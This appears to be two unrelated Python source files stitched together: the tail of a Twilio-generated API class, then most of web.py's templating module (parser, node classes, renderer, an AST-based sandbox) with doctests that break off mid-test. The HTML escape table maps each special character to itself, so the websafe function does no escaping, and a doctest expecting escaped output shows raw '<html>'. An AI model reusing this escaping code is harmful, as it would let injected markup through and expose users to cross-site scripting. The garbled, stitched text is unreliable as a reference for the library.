:param unicode x_xcnam_sensitive_phone_number: Phone number to retrieve CPS.
:returns: The fetched CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
return self._proxy.fetch(x_xcnam_sensitive_phone_number=x_xcnam_sensitive_phone_number, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.TrustedComms.CpsInstance {}>'.format(context)
| |
"""
simple, elegant templating
(part of web.py)
Template design:
Template string is split into tokens and the tokens are combined into nodes.
Parse tree is a nodelist. TextNode and ExpressionNode are simple nodes and
for-loop, if-loop etc are block nodes, which contain multiple child nodes.
Each node can emit some python string. python string emitted by the
root node is validated for safeeval and executed using python in the given environment.
Enough care is taken to make sure the generated code and the template has line to line match,
so that the error messages can point to exact line number in template. (It doesn't work in some cases still.)
Grammar:
template -> defwith sections
defwith -> '$def with (' arguments ')' | ''
sections -> section*
section -> block | assignment | line
assignment -> '$ ' <assignment expression>
line -> (text|expr)*
text -> <any characters other than $>
expr -> '$' pyexpr | '$(' pyexpr ')' | '${' pyexpr '}'
pyexpr -> <python expression>
"""
__all__ = [
"Template",
"Render", "render", "frender",
"ParseError", "SecurityError",
"test"
]
import tokenize
import os
import glob
import re
from utils import storage, safeunicode, safestr, re_compile
from webapi import config
from net import websafe
def splitline(text):
r"""
Splits the given text at newline.
>>> splitline('foo\nbar')
('foo\n', 'bar')
>>> splitline('foo')
('foo', '')
>>> splitline('')
('', '')
"""
index = text.find('\n') + 1
if index:
return text[:index], text[index:]
else:
return text, ''
class Parser:
"""Parser Base.
"""
def __init__(self):
self.statement_nodes = STATEMENT_NODES
self.keywords = KEYWORDS
def parse(self, text, name="<template>"):
self.text = text
self.name = name
defwith, text = self.read_defwith(text)
suite = self.read_suite(text)
return DefwithNode(defwith, suite)
def read_defwith(self, text):
if text.startswith('$def with'):
defwith, text = splitline(text)
defwith = defwith[1:].strip() # strip $ and spaces
return defwith, text
else:
return '', text
def read_section(self, text):
r"""Reads one section from the given text.
section -> block | assignment | line
>>> read_section = Parser().read_section
>>> read_section('foo\nbar\n')
(<line: [t'foo\n']>, 'bar\n')
>>> read_section('$ a = b + 1\nfoo\n')
(<assignment: 'a = b + 1'>, 'foo\n')
read_section('$for in range(10):\n hello $i\nfoo)
"""
if text.lstrip(' ').startswith('$'):
index = text.index('$')
begin_indent, text2 = text[:index], text[index+1:]
ahead = self.python_lookahead(text2)
if ahead == 'var':
return self.read_var(text2)
elif ahead in self.statement_nodes:
return self.read_block_section(text2, begin_indent)
elif ahead in self.keywords:
return self.read_keyword(text2)
elif ahead.strip() == '':
# assignments starts with a space after $
# ex: $ a = b + 2
return self.read_assignment(text2)
return self.readline(text)
def read_var(self, text):
r"""Reads a var statement.
>>> read_var = Parser().read_var
>>> read_var('var x=10\nfoo')
(<var: x = 10>, 'foo')
>>> read_var('var x: hello $name\nfoo')
(<var: x = join_(u'hello ', escape_(name, True))>, 'foo')
"""
line, text = splitline(text)
tokens = self.python_tokens(line)
if len(tokens) < 4:
raise SyntaxError('Invalid var statement')
name = tokens[1]
sep = tokens[2]
value = line.split(sep, 1)[1].strip()
if sep == '=':
pass # no need to process value
elif sep == ':':
#@@ Hack for backward-compatability
if tokens[3] == '\n': # multi-line var statement
block, text = self.read_indented_block(text, ' ')
lines = [self.readline(x)[0] for x in block.splitlines()]
nodes = []
for x in lines:
nodes.extend(x.nodes)
nodes.append(TextNode('\n'))
else: # single-line var statement
linenode, _ = self.readline(value)
nodes = linenode.nodes
parts = [node.emit('') for node in nodes]
value = "join_(%s)" % ", ".join(parts)
else:
raise SyntaxError('Invalid var statement')
return VarNode(name, value), text
def read_suite(self, text):
r"""Reads section by section till end of text.
>>> read_suite = Parser().read_suite
>>> read_suite('hello $name\nfoo\n')
[<line: [t'hello ', $name, t'\n']>, <line: [t'foo\n']>]
"""
sections = []
while text:
section, text = self.read_section(text)
sections.append(section)
return SuiteNode(sections)
def readline(self, text):
r"""Reads one line from the text. Newline is supressed if the line ends with \.
>>> readline = Parser().readline
>>> readline('hello $name!\nbye!')
(<line: [t'hello ', $name, t'!\n']>, 'bye!')
>>> readline('hello $name!\\\nbye!')
(<line: [t'hello ', $name, t'!']>, 'bye!')
>>> readline('$f()\n\n')
(<line: [$f(), t'\n']>, '\n')
"""
line, text = splitline(text)
# supress new line if line ends with \
if line.endswith('\\\n'):
line = line[:-2]
nodes = []
while line:
node, line = self.read_node(line)
nodes.append(node)
return LineNode(nodes), text
def read_node(self, text):
r"""Reads a node from the given text and returns the node and remaining text.
>>> read_node = Parser().read_node
>>> read_node('hello $name')
(t'hello ', '$name')
>>> read_node('$name')
($name, '')
"""
if text.startswith('$$'):
return TextNode('$'), text[2:]
elif text.startswith('$#'): # comment
line, text = splitline(text)
return TextNode('\n'), text
elif text.startswith('$'):
text = text[1:] # strip $
if text.startswith(':'):
escape = False
text = text[1:] # strip :
else:
escape = True
return self.read_expr(text, escape=escape)
else:
return self.read_text(text)
def read_text(self, text):
r"""Reads a text node from the given text.
>>> read_text = Parser().read_text
>>> read_text('hello $name')
(t'hello ', '$name')
"""
index = text.find('$')
if index < 0:
return TextNode(text), ''
else:
return TextNode(text[:index]), text[index:]
def read_keyword(self, text):
line, text = splitline(text)
return StatementNode(line.strip() + "\n"), text
def read_expr(self, text, escape=True):
"""Reads a python expression from the text and returns the expression and remaining text.
expr -> simple_expr | paren_expr
simple_expr -> id extended_expr
extended_expr -> attr_access | paren_expr extended_expr | ''
attr_access -> dot id extended_expr
paren_expr -> [ tokens ] | ( tokens ) | { tokens }
>>> read_expr = Parser().read_expr
>>> read_expr("name")
($name, '')
>>> read_expr("a.b and c")
($a.b, ' and c')
>>> read_expr("a. b")
($a, '. b')
>>> read_expr("name</h1>")
($name, '</h1>')
>>> read_expr("(limit)ing")
($(limit), 'ing')
>>> read_expr('a[1, 2][:3].f(1+2, "weird string[).", 3 + 4) done.')
($a[1, 2][:3].f(1+2, "weird string[).", 3 + 4), ' done.')
"""
def simple_expr():
identifier()
extended_expr()
def identifier():
tokens.next()
def extended_expr():
lookahead = tokens.lookahead()
if lookahead is None:
return
elif lookahead.value == '.':
attr_access()
elif lookahead.value in parens:
paren_expr()
extended_expr()
else:
return
def attr_access():
from token import NAME # python token constants
dot = tokens.lookahead()
if tokens.lookahead2().type == NAME:
tokens.next() # consume dot
identifier()
extended_expr()
def paren_expr():
begin = tokens.next().value
end = parens[begin]
while True:
if tokens.lookahead().value in parens:
paren_expr()
else:
t = tokens.next()
if t.value == end:
break
return
parens = {
"(": ")",
"[": "]",
"{": "}"
}
def get_tokens(text):
"""tokenize text using python tokenizer.
Python tokenizer ignores spaces, but they might be important in some cases.
This function introduces dummy space tokens when it identifies any ignored space.
Each token is a storage object containing type, value, begin and end.
"""
readline = iter([text]).next
end = None
for t in tokenize.generate_tokens(readline):
t = storage(type=t[0], value=t[1], begin=t[2], end=t[3])
if end is not None and end != t.begin:
_, x1 = end
_, x2 = t.begin
yield storage(type=-1, value=text[x1:x2], begin=end, end=t.begin)
end = t.end
yield t
class BetterIter:
"""Iterator like object with 2 support for 2 look aheads."""
def __init__(self, items):
self.iteritems = iter(items)
self.items = []
self.position = 0
self.current_item = None
def lookahead(self):
if len(self.items) <= self.position:
self.items.append(self._next())
return self.items[self.position]
def _next(self):
try:
return self.iteritems.next()
except StopIteration:
return None
def lookahead2(self):
if len(self.items) <= self.position+1:
self.items.append(self._next())
return self.items[self.position+1]
def next(self):
self.current_item = self.lookahead()
self.position += 1
return self.current_item
tokens = BetterIter(get_tokens(text))
if tokens.lookahead().value in parens:
paren_expr()
else:
simple_expr()
row, col = tokens.current_item.end
return ExpressionNode(text[:col], escape=escape), text[col:]
def read_assignment(self, text):
r"""Reads assignment statement from text.
>>> read_assignment = Parser().read_assignment
>>> read_assignment('a = b + 1\nfoo')
(<assignment: 'a = b + 1'>, 'foo')
"""
line, text = splitline(text)
return AssignmentNode(line.strip()), text
def python_lookahead(self, text):
"""Returns the first python token from the given text.
>>> python_lookahead = Parser().python_lookahead
>>> python_lookahead('for i in range(10):')
'for'
>>> python_lookahead('else:')
'else'
>>> python_lookahead(' x = 1')
' '
"""
readline = iter([text]).next
tokens = tokenize.generate_tokens(readline)
return tokens.next()[1]
def python_tokens(self, text):
readline = iter([text]).next
tokens = tokenize.generate_tokens(readline)
return [t[1] for t in tokens]
def read_indented_block(self, text, indent):
r"""Read a block of text. A block is what typically follows a for or it statement.
It can be in the same line as that of the statement or an indented block.
>>> read_indented_block = Parser().read_indented_block
>>> read_indented_block(' a\n b\nc', ' ')
('a\nb\n', 'c')
>>> read_indented_block(' a\n b\n c\nd', ' ')
('a\n b\nc\n', 'd')
>>> read_indented_block(' a\n\n b\nc', ' ')
('a\n\n b\n', 'c')
"""
if indent == '':
return '', text
block = ""
while text:
line, text2 = splitline(text)
if line.strip() == "":
block += '\n'
elif line.startswith(indent):
block += line[len(indent):]
else:
break
text = text2
return block, text
def read_statement(self, text):
r"""Reads a python statement.
>>> read_statement = Parser().read_statement
>>> read_statement('for i in range(10): hello $name')
('for i in range(10):', ' hello $name')
"""
tok = PythonTokenizer(text)
tok.consume_till(':')
return text[:tok.index], text[tok.index:]
def read_block_section(self, text, begin_indent=''):
r"""
>>> read_block_section = Parser().read_block_section
>>> read_block_section('for i in range(10): hello $i\nfoo')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, 'foo')
>>> read_block_section('for i in range(10):\n hello $i\n foo', begin_indent=' ')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, ' foo')
>>> read_block_section('for i in range(10):\n hello $i\nfoo')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, 'foo')
"""
line, text = splitline(text)
stmt, line = self.read_statement(line)
keyword = self.python_lookahead(stmt)
# if there is some thing left in the line
if line.strip():
block = line.lstrip()
else:
def find_indent(text):
rx = re_compile(' +')
match = rx.match(text)
first_indent = match and match.group(0)
return first_indent or ""
# find the indentation of the block by looking at the first line
first_indent = find_indent(text)[len(begin_indent):]
#TODO: fix this special case
if keyword == "code":
indent = begin_indent + first_indent
else:
indent = begin_indent + min(first_indent, INDENT)
block, text = self.read_indented_block(text, indent)
return self.create_block_node(keyword, stmt, block, begin_indent), text
def create_block_node(self, keyword, stmt, block, begin_indent):
if keyword in self.statement_nodes:
return self.statement_nodes[keyword](stmt, block, begin_indent)
else:
raise ParseError, 'Unknown statement: %s' % repr(keyword)
class PythonTokenizer:
"""Utility wrapper over python tokenizer."""
def __init__(self, text):
self.text = text
readline = iter([text]).next
self.tokens = tokenize.generate_tokens(readline)
self.index = 0
def consume_till(self, delim):
"""Consumes tokens till colon.
>>> tok = PythonTokenizer('for i in range(10): hello $i')
>>> tok.consume_till(':')
>>> tok.text[:tok.index]
'for i in range(10):'
>>> tok.text[tok.index:]
' hello $i'
"""
try:
while True:
t = self.next()
if t.value == delim:
break
elif t.value == '(':
self.consume_till(')')
elif t.value == '[':
self.consume_till(']')
elif t.value == '{':
self.consume_till('}')
# if end of line is found, it is an exception.
# Since there is no easy way to report the line number,
# leave the error reporting to the python parser later
#@@ This should be fixed.
if t.value == '\n':
break
except:
#raise ParseError, "Expected %s, found end of line." % repr(delim)
# raising ParseError doesn't show the line number.
# if this error is ignored, then it will be caught when compiling the python code.
return
def next(self):
type, t, begin, end, line = self.tokens.next()
row, col = end
self.index = col
return storage(type=type, value=t, begin=begin, end=end)
class DefwithNode:
def __init__(self, defwith, suite):
if defwith:
self.defwith = defwith.replace('with', '__template__') + ':'
# offset 3 lines. for __lineoffset__, loop and self.
self.defwith += "\n __lineoffset__ = -3"
else:
self.defwith = 'def __template__():'
# offset 4 lines for __template__, __lineoffset__, loop and self.
self.defwith += "\n __lineoffset__ = -4"
self.defwith += "\n loop = ForLoop()"
self.defwith += "\n self = TemplateResult(); extend_ = self.extend"
self.suite = suite
self.end = "\n return self"
def emit(self, indent):
return self.defwith + self.suite.emit(indent + INDENT) + self.end
def __repr__(self):
return "<defwith: %s, %s>" % (self.defwith, self.suite)
class TextNode:
def __init__(self, value):
self.value = value
def emit(self, indent):
return repr(safeunicode(self.value))
def __repr__(self):
return 't' + repr(self.value)
class ExpressionNode:
def __init__(self, value, escape=True):
self.value = value.strip()
# convert ${...} to $(...)
if value.startswith('{') and value.endswith('}'):
self.value = '(' + self.value[1:-1] + ')'
self.escape = escape
def emit(self, indent):
return 'escape_(%s, %s)' % (self.value, bool(self.escape))
def __repr__(self):
if self.escape:
escape = ''
else:
escape = ':'
return "$%s%s" % (escape, self.value)
class AssignmentNode:
def __init__(self, code):
self.code = code
def emit(self, indent, begin_indent=''):
return indent + self.code + "\n"
def __repr__(self):
return "<assignment: %s>" % repr(self.code)
class LineNode:
def __init__(self, nodes):
self.nodes = nodes
def emit(self, indent, text_indent='', name=''):
text = [node.emit('') for node in self.nodes]
if text_indent:
text = [repr(text_indent)] + text
return indent + "extend_([%s])\n" % ", ".join(text)
def __repr__(self):
return "<line: %s>" % repr(self.nodes)
INDENT = u' ' # 4 spaces
class BlockNode:
def __init__(self, stmt, block, begin_indent=''):
self.stmt = stmt
self.suite = Parser().read_suite(block)
self.begin_indent = begin_indent
def emit(self, indent, text_indent=''):
text_indent = self.begin_indent + text_indent
out = indent + self.stmt + self.suite.emit(indent + INDENT, text_indent)
return out
def __repr__(self):
return "<block: %s, %s>" % (repr(self.stmt), repr(self.suite))
class ForNode(BlockNode):
def __init__(self, stmt, block, begin_indent=''):
self.original_stmt = stmt
tok = PythonTokenizer(stmt)
tok.consume_till('in')
a = stmt[:tok.index] # for i in
b = stmt[tok.index:-1] # rest of for stmt excluding :
stmt = a + ' loop.setup(' + b.strip() + '):'
BlockNode.__init__(self, stmt, block, begin_indent)
def __repr__(self):
return "<block: %s, %s>" % (repr(self.original_stmt), repr(self.suite))
class CodeNode:
def __init__(self, stmt, block, begin_indent=''):
# compensate one line for $code:
self.code = "\n" + block
def emit(self, indent, text_indent=''):
import re
rx = re.compile('^', re.M)
return rx.sub(indent, self.code).rstrip(' ')
def __repr__(self):
return "<code: %s>" % repr(self.code)
class StatementNode:
def __init__(self, stmt):
self.stmt = stmt
def emit(self, indent):
return indent + self.stmt
def __repr__(self):
return "<stmt: %s>" % repr(self.stmt)
class IfNode(BlockNode):
pass
class ElseNode(BlockNode):
pass
class ElifNode(BlockNode):
pass
class DefNode(BlockNode):
def __init__(self, *a, **kw):
BlockNode.__init__(self, *a, **kw)
code = CodeNode("", "")
code.code = "self = TemplateResult(); extend_ = self.extend\n"
self.suite.sections.insert(0, code)
code = CodeNode("", "")
code.code = "return self\n"
self.suite.sections.append(code)
def emit(self, indent, text_indent=''):
text_indent = self.begin_indent + text_indent
out = indent + self.stmt + self.suite.emit(indent + INDENT, text_indent)
return indent + "__lineoffset__ -= 3\n" + out
class VarNode:
def __init__(self, name, value):
self.name = name
self.value = value
def emit(self, indent, text_indent):
return indent + "self[%s] = %s\n" % (repr(self.name), self.value)
def __repr__(self):
return "<var: %s = %s>" % (self.name, self.value)
class SuiteNode:
"""Suite is a list of sections."""
def __init__(self, sections):
self.sections = sections
def emit(self, indent, text_indent=''):
return "\n" + "".join([s.emit(indent, text_indent) for s in self.sections])
def __repr__(self):
return repr(self.sections)
STATEMENT_NODES = {
'for': ForNode,
'while': BlockNode,
'if': IfNode,
'elif': ElifNode,
'else': ElseNode,
'def': DefNode,
'code': CodeNode
}
KEYWORDS = [
"pass",
"break",
"continue",
"return"
]
TEMPLATE_BUILTIN_NAMES = [
"dict", "enumerate", "float", "int", "bool", "list", "long", "reversed",
"set", "slice", "tuple", "xrange",
"abs", "all", "any", "callable", "chr", "cmp", "divmod", "filter", "hex",
"id", "isinstance", "iter", "len", "max", "min", "oct", "ord", "pow", "range",
"True", "False",
"None",
"__import__", # some c-libraries like datetime requires __import__ to present in the namespace
]
import __builtin__
TEMPLATE_BUILTINS = dict([(name, getattr(__builtin__, name)) for name in TEMPLATE_BUILTIN_NAMES if name in __builtin__.__dict__])
class ForLoop:
"""
Wrapper for expression in for stament to support loop.xxx helpers.
>>> loop = ForLoop()
>>> for x in loop.setup(['a', 'b', 'c']):
... print loop.index, loop.revindex, loop.parity, x
...
1 3 odd a
2 2 even b
3 1 odd c
>>> loop.index
Traceback (most recent call last):
...
AttributeError: index
"""
def __init__(self):
self._ctx = None
def __getattr__(self, name):
if self._ctx is None:
raise AttributeError, name
else:
return getattr(self._ctx, name)
def setup(self, seq):
self._push()
return self._ctx.setup(seq)
def _push(self):
self._ctx = ForLoopContext(self, self._ctx)
def _pop(self):
self._ctx = self._ctx.parent
class ForLoopContext:
"""Stackable context for ForLoop to support nested for loops.
"""
def __init__(self, forloop, parent):
self._forloop = forloop
self.parent = parent
def setup(self, seq):
try:
self.length = len(seq)
except:
self.length = 0
self.index = 0
for a in seq:
self.index += 1
yield a
self._forloop._pop()
index0 = property(lambda self: self.index-1)
first = property(lambda self: self.index == 1)
last = property(lambda self: self.index == self.length)
odd = property(lambda self: self.index % 2 == 1)
even = property(lambda self: self.index % 2 == 0)
parity = property(lambda self: ['odd', 'even'][self.even])
revindex0 = property(lambda self: self.length - self.index)
revindex = property(lambda self: self.length - self.index + 1)
class BaseTemplate:
def __init__(self, code, filename, filter, globals, builtins):
self.filename = filename
self.filter = filter
self._globals = globals
self._builtins = builtins
if code:
self.t = self._compile(code)
else:
self.t = lambda: ''
def _compile(self, code):
env = self.make_env(self._globals or {}, self._builtins)
exec(code, env)
return env['__template__']
def __call__(self, *a, **kw):
__hidetraceback__ = True
return self.t(*a, **kw)
def make_env(self, globals, builtins):
return dict(globals,
__builtins__=builtins,
ForLoop=ForLoop,
TemplateResult=TemplateResult,
escape_=self._escape,
join_=self._join
)
def _join(self, *items):
return u"".join(items)
def _escape(self, value, escape=False):
if value is None:
value = ''
value = safeunicode(value)
if escape and self.filter:
value = self.filter(value)
return value
_htmlquote_re = re.compile(r'[&<>"\']')
_htmlquote_d = {
u"&": u"&",
u"<": u"<",
u">": u">",
u"'": u"'",
u'"': u""",
}
def websafe(text):
r"""
Encodes `text` for raw use in HTML.
>>> websafe(u"<'&\">")
u'<'&">'
Unlike the websafe function in utils.py, this works with unicode text.
"""
return _htmlquote_re.sub(lambda m: _htmlquote_d[m.group(0)], text)
class Template(BaseTemplate):
CONTENT_TYPES = {
'.html' : 'text/html; charset=utf-8',
'.xhtml' : 'application/xhtml+xml; charset=utf-8',
'.txt' : 'text/plain',
}
FILTERS = {
'.html': websafe,
'.xhtml': websafe,
'.xml': websafe
}
globals = {}
def __init__(self, text, filename='<template>', filter=None, globals=None, builtins=None, extensions=None):
self.extensions = extensions or []
text = Template.normalize_text(text)
code = self.compile_template(text, filename)
_, ext = os.path.splitext(filename)
filter = filter or self.FILTERS.get(ext, None)
self.content_type = self.CONTENT_TYPES.get(ext, None)
if globals is None:
globals = self.globals
if builtins is None:
builtins = TEMPLATE_BUILTINS
BaseTemplate.__init__(self, code=code, filename=filename, filter=filter, globals=globals, builtins=builtins)
def normalize_text(text):
"""Normalizes template text by correcting \r\n, tabs and BOM chars."""
text = text.replace('\r\n', '\n').replace('\r', '\n').expandtabs()
if not text.endswith('\n'):
text += '\n'
# ignore BOM chars at the begining of template
BOM = '\xef\xbb\xbf'
if isinstance(text, str) and text.startswith(BOM):
text = text[len(BOM):]
# support fort \$ for backward-compatibility
text = text.replace(r'\$', '$$')
return text
normalize_text = staticmethod(normalize_text)
def __call__(self, *a, **kw):
__hidetraceback__ = True
import webapi as web
if 'headers' in web.ctx and self.content_type:
web.header('Content-Type', self.content_type, unique=True)
return BaseTemplate.__call__(self, *a, **kw)
def generate_code(text, filename, parser=None):
# parse the text
parser = parser or Parser()
rootnode = parser.parse(text, filename)
# generate python code from the parse tree
code = rootnode.emit(indent="").strip()
return safestr(code)
generate_code = staticmethod(generate_code)
def create_parser(self):
p = Parser()
for ext in self.extensions:
p = ext(p)
return p
def compile_template(self, template_string, filename):
code = Template.generate_code(template_string, filename, parser=self.create_parser())
def get_source_line(filename, lineno):
try:
lines = open(filename).read().splitlines()
return lines[lineno]
except:
return None
try:
# compile the code first to report the errors, if any, with the filename
compiled_code = compile(code, filename, 'exec')
except SyntaxError, e:
# display template line that caused the error along with the traceback.
try:
e.msg += '\n\nTemplate traceback:\n File %s, line %s\n %s' % \
(repr(e.filename), e.lineno, get_source_line(e.filename, e.lineno-1))
except:
pass
raise
# make sure code is safe
import compiler
ast = compiler.parse(code)
SafeVisitor().walk(ast, filename)
return compiled_code
class CompiledTemplate(Template):
def __init__(self, f, filename):
Template.__init__(self, '', filename)
self.t = f
def compile_template(self, *a):
return None
def _compile(self, *a):
return None
class Render:
"""The most preferred way of using templates.
render = web.template.render('templates')
print render.foo()
Optional parameter can be `base` can be used to pass output of
every template through the base template.
render = web.template.render('templates', base='layout')
"""
def __init__(self, loc='templates', cache=None, base=None, **keywords):
self._loc = loc
self._keywords = keywords
if cache is None:
cache = not config.get('debug', False)
if cache:
self._cache = {}
else:
self._cache = None
if base and not hasattr(base, '__call__'):
# make base a function, so that it can be passed to sub-renders
self._base = lambda page: self._template(base)(page)
else:
self._base = base
def _add_global(self, obj, name=None):
"""Add a global to this rendering instance."""
if 'globals' not in self._keywords: self._keywords['globals'] = {}
if not name:
name = obj.__name__
self._keywords['globals'][name] = obj
def _lookup(self, name):
path = os.path.join(self._loc, name)
if os.path.isdir(path):
return 'dir', path
else:
path = self._findfile(path)
if path:
return 'file', path
else:
return 'none', None
def _load_template(self, name):
kind, path = self._lookup(name)
if kind == 'dir':
return Render(path, cache=self._cache is not None, base=self._base, **self._keywords)
elif kind == 'file':
return Template(open(path).read(), filename=path, **self._keywords)
else:
raise AttributeError, "No template named " + name
def _findfile(self, path_prefix):
p = [f for f in glob.glob(path_prefix + '.*') if not f.endswith('~')] # skip backup files
p.sort() # sort the matches for deterministic order
return p and p[0]
def _template(self, name):
if self._cache is not None:
if name not in self._cache:
self._cache[name] = self._load_template(name)
return self._cache[name]
else:
return self._load_template(name)
def __getattr__(self, name):
t = self._template(name)
if self._base and isinstance(t, Template):
def template(*a, **kw):
return self._base(t(*a, **kw))
return template
else:
return self._template(name)
class GAE_Render(Render):
# Render gets over-written. make a copy here.
super = Render
def __init__(self, loc, *a, **kw):
GAE_Render.super.__init__(self, loc, *a, **kw)
import types
if isinstance(loc, types.ModuleType):
self.mod = loc
else:
name = loc.rstrip('/').replace('/', '.')
self.mod = __import__(name, None, None, ['x'])
self.mod.__dict__.update(kw.get('builtins', TEMPLATE_BUILTINS))
self.mod.__dict__.update(Template.globals)
self.mod.__dict__.update(kw.get('globals', {}))
def _load_template(self, name):
t = getattr(self.mod, name)
import types
if isinstance(t, types.ModuleType):
return GAE_Render(t, cache=self._cache is not None, base=self._base, **self._keywords)
else:
return t
render = Render
# setup render for Google App Engine.
try:
from google import appengine
render = Render = GAE_Render
except ImportError:
pass
def frender(path, **keywords):
"""Creates a template from the given file path.
"""
return Template(open(path).read(), filename=path, **keywords)
def compile_templates(root):
"""Compiles templates to python code."""
re_start = re_compile('^', re.M)
for dirpath, dirnames, filenames in os.walk(root):
filenames = [f for f in filenames if not f.startswith('.') and not f.endswith('~') and not f.startswith('__init__.py')]
for d in dirnames[:]:
if d.startswith('.'):
dirnames.remove(d) # don't visit this dir
out = open(os.path.join(dirpath, '__init__.py'), 'w')
out.write('from web.template import CompiledTemplate, ForLoop, TemplateResult\n\n')
if dirnames:
out.write("import " + ", ".join(dirnames))
out.write("_dummy = CompiledTemplate(lambda: None, 'dummy')\n")
out.write("join_ = _dummy._join\n")
out.write("escape_ = _dummy._escape\n")
out.write("\n")
for f in filenames:
path = os.path.join(dirpath, f)
if '.' in f:
name, _ = f.split('.', 1)
else:
name = f
text = open(path).read()
text = Template.normalize_text(text)
code = Template.generate_code(text, path)
code = code.replace("__template__", name, 1)
out.write(code)
out.write('\n\n')
out.write('%s = CompiledTemplate(%s, %s)\n\n' % (name, name, repr(path)))
# create template to make sure it compiles
t = Template(open(path).read(), path)
out.close()
class ParseError(Exception):
pass
class SecurityError(Exception):
"""The template seems to be trying to do something naughty."""
pass
# Enumerate all the allowed AST nodes
ALLOWED_AST_NODES = [
"Add", "And",
# "AssAttr",
"AssList", "AssName", "AssTuple",
# "Assert",
"Assign", "AugAssign",
# "Backquote",
"Bitand", "Bitor", "Bitxor", "Break",
"CallFunc","Class", "Compare", "Const", "Continue",
"Decorators", "Dict", "Discard", "Div",
"Ellipsis", "EmptyNode",
# "Exec",
"Expression", "FloorDiv", "For",
# "From",
"Function",
"GenExpr", "GenExprFor", "GenExprIf", "GenExprInner",
"Getattr",
# "Global",
"If", "IfExp",
# "Import",
"Invert", "Keyword", "Lambda", "LeftShift",
"List", "ListComp", "ListCompFor", "ListCompIf", "Mod",
"Module",
"Mul", "Name", "Not", "Or", "Pass", "Power",
# "Print", "Printnl", "Raise",
"Return", "RightShift", "Slice", "Sliceobj",
"Stmt", "Sub", "Subscript",
# "TryExcept", "TryFinally",
"Tuple", "UnaryAdd", "UnarySub",
"While", "With", "Yield",
]
class SafeVisitor(object):
"""
Make sure code is safe by walking through the AST.
Code considered unsafe if:
* it has restricted AST nodes
* it is trying to access resricted attributes
Adopted from http://www.zafar.se/bkz/uploads/safe.txt (public domain, Babar K. Zafar)
"""
def __init__(self):
"Initialize visitor by generating callbacks for all AST node types."
self.errors = []
def walk(self, ast, filename):
"Validate each node in AST and raise SecurityError if the code is not safe."
self.filename = filename
self.visit(ast)
if self.errors:
raise SecurityError, '\n'.join([str(err) for err in self.errors])
def visit(self, node, *args):
"Recursively validate node and all of its children."
def classname(obj):
return obj.__class__.__name__
nodename = classname(node)
fn = getattr(self, 'visit' + nodename, None)
if fn:
fn(node, *args)
else:
if nodename not in ALLOWED_AST_NODES:
self.fail(node, *args)
for child in node.getChildNodes():
self.visit(child, *args)
def visitName(self, node, *args):
"Disallow any attempts to access a restricted attr."
#self.assert_attr(node.getChildren()[0], node)
pass
def visitGetattr(self, node, *args):
"Disallow any attempts to access a restricted attribute."
self.assert_attr(node.attrname, node)
def assert_attr(self, attrname, node):
if self.is_unallowed_attr(attrname):
lineno = self.get_node_lineno(node)
e = SecurityError("%s:%d - access to attribute '%s' is denied" % (self.filename, lineno, attrname))
self.errors.append(e)
def is_unallowed_attr(self, name):
return name.startswith('_') \
or name.startswith('func_') \
or name.startswith('im_')
def get_node_lineno(self, node):
return (node.lineno) and node.lineno or 0
def fail(self, node, *args):
"Default callback for unallowed AST nodes."
lineno = self.get_node_lineno(node)
nodename = node.__class__.__name__
e = SecurityError("%s:%d - execution of '%s' statements is denied" % (self.filename, lineno, nodename))
self.errors.append(e)
class TemplateResult(storage):
"""Dictionary like object for storing template output.
A template can specify key-value pairs in the output using
`var` statements. Each `var` statement adds a new key to the
template output and the main output is stored with key
__body__.
>>> d = TemplateResult(__body__='hello, world', x='foo')
>>> d
<TemplateResult: {'__body__': 'hello, world', 'x': 'foo'}>
>>> print d
hello, world
>>> d = TemplateResult()
>>> d.extend([u'hello', u'world'])
>>> d
<TemplateResult: {'__body__': u'helloworld'}>
"""
def __init__(self, *a, **kw):
storage.__init__(self, *a, **kw)
self.setdefault("__body__", None)
# avoiding self._data because add it as self["_data"]
self.__dict__["_data"] = []
self.__dict__["extend"] = self._data.extend
def __getitem__(self, name):
if name == "__body__" and storage.__getitem__(self, '__body__') is None:
self["__body__"] = u"".join(self._data)
return storage.__getitem__(self, name)
def __unicode__(self):
return self["__body__"]
def __str__(self):
return self["__body__"].encode('utf-8')
def __repr__(self):
self["__body__"] # initialize __body__ if not already initialized
return "<TemplateResult: %s>" % dict.__repr__(self)
def test():
r"""Doctest for testing template module.
Define a utility function to run template test.
>>> class TestResult:
... def __init__(self, t): self.t = t
... def __getattr__(self, name): return getattr(self.t, name)
... def __repr__(self): return repr(unicode(self))
...
>>> def t(code, **keywords):
... tmpl = Template(code, **keywords)
... return lambda *a, **kw: TestResult(tmpl(*a, **kw))
...
Simple tests.
>>> t('1')()
u'1\n'
>>> t('$def with ()\n1')()
u'1\n'
>>> t('$def with (a)\n$a')(1)
u'1\n'
>>> t('$def with (a=0)\n$a')(1)
u'1\n'
>>> t('$def with (a=0)\n$a')(a=1)
u'1\n'
Test complicated expressions.
>>> t('$def with (x)\n$x.upper()')('hello')
u'HELLO\n'
>>> t('$(2 * 3 + 4 * 5)')()
u'26\n'
>>> t('${2 * 3 + 4 * 5}')()
u'26\n'
>>> t('$def with (limit)\nkeep $(limit)ing.')('go')
u'keep going.\n'
>>> t('$def with (a)\n$a.b[0]')(storage(b=[1]))
u'1\n'
Test html escaping.
>>> t('$def with (x)\n$x', filename='a.html')('<html>')
u'<html>\n'
>>> t('$def with (x)\n$x', filename='a.txt')('<html>')
u'<html>\n'
Test if, for and while.
>>> t('$if 1: 1')()
u'1\n'
>>> t('$if 1:\n 1')()
u'1\n'
>>> t('$if 1:\n 1\\')()
u'1'
>>> t('$if 0: 0\n$elif 1: 1')()
u'1\n'
>>> t('$if 0: 0\n$elif None: 0\n$else: 1')()
u'1\n'
>>> t('$if 0 < 1 and 1 < 2: 1')()
u'1\n'
>>> t('$for x in [1, 2, 3]: $x')()
u'1\n2\n3\n'
>>> t('$def with (d)\n$for k, v in d.iteritems(): $k')({1: 1})
u'1\n'
>>> t('$for x in [1, 2, 3]:\n\t$x')()
u' 1\n 2\n 3\n'
>>> t('$def with (a)\n$while a and a.pop():1')([1, 2, 3])
u'1\n1\n1\n'
The space after : must be ignored.
>>> t('$if True: foo')()
u'foo\n'
Test loop.xxx.
